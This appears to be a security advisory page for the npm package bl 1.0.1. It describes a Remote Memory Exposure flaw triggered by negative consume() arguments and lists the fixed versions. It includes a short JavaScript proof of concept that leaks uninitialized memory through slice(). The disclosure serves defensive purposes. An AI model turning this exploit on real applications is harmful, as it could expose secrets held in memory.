bl@1.0.1 vulnerabilities

Buffer List: collect buffers and access with a standard readable Buffer interface, streamable too!

Direct Vulnerabilities

Known vulnerabilities in the bl package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • H
Remote Memory Exposure

bl is a library that allows you to collect buffers and access with a standard readable buffer interface.

Affected versions of this package are vulnerable to Remote Memory Exposure. If user input ends up in consume() argument and can become negative, BufferList state can be corrupted, tricking it into exposing uninitialized memory via regular .slice() calls.

PoC by chalker

const { BufferList } = require('bl')
const secret = require('crypto').randomBytes(256)
for (let i = 0; i < 1e6; i++) {
  const clone = Buffer.from(secret)
  const bl = new BufferList()
  bl.append(Buffer.from('a'))
  bl.consume(-1024)
  const buf = bl.slice(1)
  if (buf.indexOf(clone) !== -1) {
    console.error(`Match (at ${i})`, buf)
  }
}

How to fix Remote Memory Exposure?

Upgrade bl to version 2.2.1, 3.0.1, 4.0.3, 1.2.3 or higher.

>=2.2.0 <2.2.1 >=3.0.0 <3.0.1 >=4.0.0 <4.0.3 <1.2.3